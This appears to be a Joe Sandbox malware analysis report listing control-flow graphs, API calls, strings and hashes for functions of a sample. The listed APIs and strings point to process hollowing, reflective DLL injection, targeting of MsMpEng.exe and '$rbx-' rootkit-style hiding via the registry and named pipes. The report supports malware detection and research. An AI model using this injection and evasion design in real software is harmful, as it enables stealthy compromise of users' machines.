                                                                                                                                                          control_flow_graph 95 140001868-1400018aa OpenProcess 96 140001cd1-140001ced 95->96 97 1400018b0-1400018c5 IsWow64Process 95->97 98 1400018d5 97->98 99 1400018c7-1400018d3 97->99 100 1400018db-1400018e7 CloseHandle 98->100 99->100 100->96 101 1400018ed-1400018f8 100->101 101->96 102 1400018fe-140001913 101->102 103 140001925 102->103 104 140001915-14000191a 102->104 106 140001927-140001929 103->106 104->96 105 140001920-140001923 104->105 105->106 106->96 107 14000192f-140001945 OpenProcess 106->107 107->96 108 14000194b-140001964 OpenProcess 107->108 109 140001a04-140001a23 NtQueryInformationProcess 108->109 110 14000196a-140001981 K32GetModuleFileNameExW 108->110 113 140001cc8-140001ccb CloseHandle 109->113 114 140001a29-140001a2d 109->114 111 1400019b3-1400019bf CloseHandle 110->111 112 140001983-14000199e PathFindFileNameW lstrlenW 110->112 111->109 116 1400019c1-1400019db 111->116 112->111 115 1400019a0-1400019b0 StrCpyW 112->115 113->96 114->113 117 140001a33-140001a4b OpenProcessToken 114->117 115->111 118 1400019e0-1400019f2 StrCmpIW 116->118 117->113 119 140001a51-140001a77 GetTokenInformation 117->119 118->113 120 1400019f8-140001a02 118->120 121 140001af4 119->121 122 140001a79-140001a82 GetLastError 119->122 120->109 120->118 123 140001afb-140001b09 CloseHandle 121->123 122->121 124 140001a84-140001a98 LocalAlloc 122->124 123->113 125 140001b0f-140001b16 123->125 124->121 126 140001a9a-140001ac0 GetTokenInformation 124->126 125->113 127 140001b1c-140001b27 125->127 128 140001ae2 126->128 129 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 126->129 127->113 130 140001b2d-140001b37 127->130 131 140001ae9-140001af2 LocalFree 128->131 129->131 132 140001b52 130->132 133 140001b39-140001b43 130->133 131->123 135 140001b56-140001b8e call 1400029a4 * 3 132->135 133->113 134 140001b49-140001b50 133->134 134->135 135->113 142 140001b94-140001bb4 call 1400029a4 StrStrA 135->142 145 140001bb6-140001bc6 142->145 146 140001bcd-140001bf2 call 1400029a4 * 2 142->146 145->142 147 140001bc8 145->147 146->113 152 140001bf8-140001c21 VirtualAllocEx 146->152 147->113 152->113 153 140001c27-140001c40 WriteProcessMemory 152->153 153->113 154 140001c46-140001c68 call 140002bfc 153->154 154->113 157 140001c6a-140001c72 154->157 157->113 158 140001c74-140001c81 WaitForSingleObject 157->158 159 140001c83-140001c97 GetExitCodeThread 158->159 160 140001cbd-140001cc2 CloseHandle 158->160 161 140001ca2-140001cbb VirtualFreeEx 159->161 162 140001c99-140001c9f 159->162 160->113 161->160 162->161
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                                                                                                                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                                                                                                                          • API String ID: 2456419452-2628171563
                                                                                                                                                          • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                                                                                                                          • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                                                                                                                                                          • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                                                                                                                                          • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740
                                                                                                                                                          Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236registrymemoryfileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 214 140003204-140003225 215 14000322b 214->215 216 14000341d-140003423 214->216 217 140003231-140003237 215->217 218 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 215->218 219 140003599-1400035bd ReadFile 216->219 220 140003429-14000342c 216->220 223 140003382-140003384 ExitProcess 217->223 224 14000323d-140003240 217->224 221 140003652-140003664 218->221 222 1400033c9-1400033da 218->222 219->221 225 1400035c3-1400035ca 219->225 226 140003432-140003438 220->226 227 14000358f-140003594 call 140001f7c 220->227 222->221 228 1400033e0-140003416 call 140001868 * 2 222->228 230 140003246-140003249 224->230 231 1400032ea-140003315 RegOpenKeyExW 224->231 225->221 232 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 225->232 233 140003534-140003547 call 1400020fc 226->233 234 14000343e-140003441 226->234 227->221 271 140003418 228->271 239 1400032db-1400032e5 230->239 240 14000324f-140003252 230->240 236 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 231->236 237 140003317-14000334d RegDeleteValueW * 3 231->237 257 14000360d-140003613 232->257 258 14000363e-14000364c GetProcessHeap HeapFree 232->258 233->221 260 14000354d-14000355c call 1400020fc 233->260 242 140003443-140003449 234->242 243 140003480-140003491 call 1400020fc 234->243 236->221 237->236 239->221 248 140003254-14000325a 240->248 249 1400032ce-1400032d6 240->249 242->221 251 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 242->251 243->221 262 140003497-1400034b9 ReadFile 243->262 248->221 256 140003260-140003284 ReadFile 248->256 249->221 256->221 265 14000328a-140003291 256->265 257->258 266 140003615-140003627 257->266 258->221 260->221 277 140003562-14000358a ShellExecuteW 260->277 262->221 270 1400034bf-1400034c6 262->270 265->221 273 140003297-1400032c9 call 140001868 * 2 265->273 274 140003629-14000362b 266->274 275 14000362d-140003635 266->275 270->221 278 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 270->278 271->221 273->221 274->275 281 140003639 call 140001eec 274->281 275->266 282 140003637 275->282 277->221 278->258 284 140003510-14000351c 278->284 281->258 282->258 284->258 287 140003522-14000352f call 140002434 284->287 287->258
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                                                                                                                                          • API String ID: 4225498131-1538754800
                                                                                                                                                          • Opcode ID: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                                                                                                                                          • Opcode Fuzzy Hash: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700
                                                                                                                                                          Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 296 140002434-140002469 297 140002911 296->297 298 14000246f-14000247b 296->298 301 140002913-14000292d 297->301 299 140002493 298->299 300 14000247d-140002487 298->300 303 140002496-140002499 299->303 300->297 302 14000248d-140002491 300->302 302->303 304 1400024d4 303->304 305 14000249b-1400024b6 call 1400020cc 303->305 306 1400024d7-140002532 CreateProcessW 304->306 305->297 322 1400024bc-1400024c7 305->322 308 1400028d7-1400028df 306->308 309 140002538-14000254f 306->309 311 1400028e1-1400028ef OpenProcess 308->311 312 1400028fc-140002903 308->312 313 140002555-14000258f call 1400020cc VirtualAllocEx 309->313 314 140002730-140002767 call 1400020cc VirtualAllocEx 309->314 311->312 315 1400028f1-1400028f6 TerminateProcess 311->315 312->297 317 140002905-14000290c 312->317 313->308 326 140002595-1400025b1 WriteProcessMemory 313->326 314->308 327 14000276d-140002789 WriteProcessMemory 314->327 315->312 317->306 322->297 323 1400024cd 322->323 323->304 326->308 328 1400025b7-1400025dc VirtualProtectEx 326->328 327->308 329 14000278f-1400027b3 VirtualProtectEx 327->329 328->308 331 1400025e2-1400025f0 328->331 329->308 330 1400027b9-1400027c7 329->330 332 140002858-140002877 VirtualAlloc 330->332 333 1400027cd 330->333 334 140002682-1400026a1 VirtualAlloc 331->334 335 1400025f6 331->335 332->308 338 140002879-14000288f Wow64GetThreadContext 332->338 336 1400027d0-1400027f2 WriteProcessMemory 333->336 334->308 337 1400026a7-1400026be GetThreadContext 334->337 339 1400025f9-14000261b WriteProcessMemory 335->339 340 1400028d5 336->340 341 1400027f8-140002803 336->341 337->308 342 1400026c4-1400026e9 WriteProcessMemory 337->342 338->308 343 140002891-1400028b4 WriteProcessMemory 338->343 339->340 344 140002621-14000262c 339->344 340->308 345 140002805-140002809 341->345 346 14000280b 341->346 342->308 347 1400026ef-14000270c SetThreadContext 342->347 343->308 348 1400028b6-1400028ca Wow64SetThreadContext 343->348 349 140002634 344->349 350 14000262e-140002632 344->350 351 14000280f-14000283e call 140002930 VirtualProtectEx 345->351 346->351 347->308 352 140002712-140002720 ResumeThread 347->352 348->340 353 140002638-140002665 call 140002930 VirtualProtectEx 349->353 350->353 351->340 360 140002844-140002852 351->360 352->308 356 140002726-14000272b 352->356 353->340 359 14000266b-14000267c 353->359 356->301 359->334 359->339 360->332 360->336
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                                                                                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                                                                                                          • API String ID: 1036100660-1371749706
                                                                                                                                                          • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                                                                                                                          • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                                                                                                                                                          • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                                                                                                                          • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                                                                                                                                                          Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                          • String ID: d
                                                                                                                                                          • API String ID: 2005889112-2564639436
                                                                                                                                                          • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                                                                                                                          • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                                                                                                                                                          • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                                                                                                                          • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                                                                                                                                                          Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                                                                                                                          • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                          • API String ID: 3993315683-3414887735
                                                                                                                                                          • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                                                                                                                          • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                                                                                                                                                          • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                                                                                                                          • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                                                                                                                          Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                                          • String ID: M$\\.\pipe\$rbx-childproc
                                                                                                                                                          • API String ID: 2203880229-2840927681
                                                                                                                                                          • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                                                                                                                          • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                                                                                                                                                          • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                                                                                                                                          • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704
                                                                                                                                                          Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4184240511-0
                                                                                                                                                          • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                                                                                                                          • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                                                                                                                                                          • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                                                                                                                          • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
                                                                                                                                                          Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 404 14000104c-1400010b9 RegQueryInfoKeyW 405 1400011b5-1400011d0 404->405 406 1400010bf-1400010c9 404->406 406->405 407 1400010cf-14000111f RegEnumValueW 406->407 408 1400011a5-1400011af 407->408 409 140001125-14000112a 407->409 408->405 408->407 409->408 410 14000112c-140001135 409->410 411 140001147-14000114c 410->411 412 140001137 410->412 413 140001199-1400011a3 411->413 414 14000114e-140001193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 411->414 415 14000113b-14000113f 412->415 413->408 414->413 415->408 416 140001141-140001145 415->416 416->411 416->415
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                          • String ID: d
                                                                                                                                                          • API String ID: 3743429067-2564639436
                                                                                                                                                          • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                                          • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                                                                                                                                          • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                                          • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                                                                                                                          Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 417 1400017a8-1400017e4 RegOpenKeyExW 418 140001841-140001866 RegDeleteKeyExW 417->418 419 1400017e6 417->419 420 1400017f3-140001839 RegEnumKeyExW 419->420 421 1400017e8-1400017ed RegDeleteKeyW 420->421 422 14000183b RegCloseKey 420->422 421->420 422->418
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Delete$CloseEnumOpen
                                                                                                                                                          • String ID: SOFTWARE\$rbx-config
                                                                                                                                                          • API String ID: 3013565938-3990243012
                                                                                                                                                          • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                                          • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                                                                                                                          • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                                          • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                                                                                                                          Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 423 140002cb0-140002cba 424 140002cbd-140002cd0 call 140002300 423->424 427 140002cd2-140002cdb Sleep 424->427 428 140002cdd-140002cea ConnectNamedPipe 424->428 427->424 429 140002d21-140002d26 Sleep 428->429 430 140002cec-140002d0d ReadFile 428->430 431 140002d2c-140002d35 DisconnectNamedPipe 429->431 430->431 432 140002d0f-140002d14 430->432 431->428 432->431 433 140002d16-140002d1f 432->433 433->431
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                                          • String ID: \\.\pipe\$rbx-control
                                                                                                                                                          • API String ID: 2071455217-3647231676
                                                                                                                                                          • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                                                                                                                          • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                                                                                                                                                          • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                                                                                                                                          • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704
                                                                                                                                                          Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3197395349-0
                                                                                                                                                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                                                                                                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                                                                                                                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                                                                                                                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44
                                                                                                                                                          Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3676546796-0
                                                                                                                                                          • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                                                                                                                                          • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00
                                                                                                                                                          Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
